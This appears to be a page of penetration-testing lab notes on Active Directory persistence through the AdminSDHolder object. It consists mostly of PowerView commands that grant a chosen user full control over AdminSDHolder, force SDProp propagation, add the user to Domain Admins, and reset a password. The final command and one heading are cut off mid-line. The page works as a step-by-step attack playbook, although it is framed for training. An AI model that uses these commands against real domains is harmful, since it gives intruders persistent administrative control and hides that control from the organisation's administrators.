1️⃣AdminSDHolder

Domain persistence using AdminC

Check if the student has replication rights

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

Add full control permissions for a user to the adminSDHolder

Add-ObjectAcl -TargetADSprefix ‘CN=AdminSDHolder,CN=System’ PrincipalSamAccountName <username> -Rights All -Verbose

Run SDProp on AD (Force the sync of AdminSDHolder)

Invoke-SDPropagator -showProgress -timeoutMinutes 1

#Before server 2008
Invoke-SDpropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Check if user got generic all against domain admins group

Get-ObjectAcl -SamaccountName “Domain Admins” –ResolveGUIDS | ?{$_.identityReference -match ‘<username>’}

Add user to domain admin group

Add-DomainGroupMember -Identity ‘Domain Admins’ -Members <username> -Verbose

Net group "domain admins" sportless /add /domain

Abuse Reset Password using powerview_dev

Set-DomainUserPassword -Identity <username> -AccountPassword (ConvertTo-SecureString "Password@123" -As

PreviousACLs NextDCsync

Last updated 1 year ago

Was this helpful?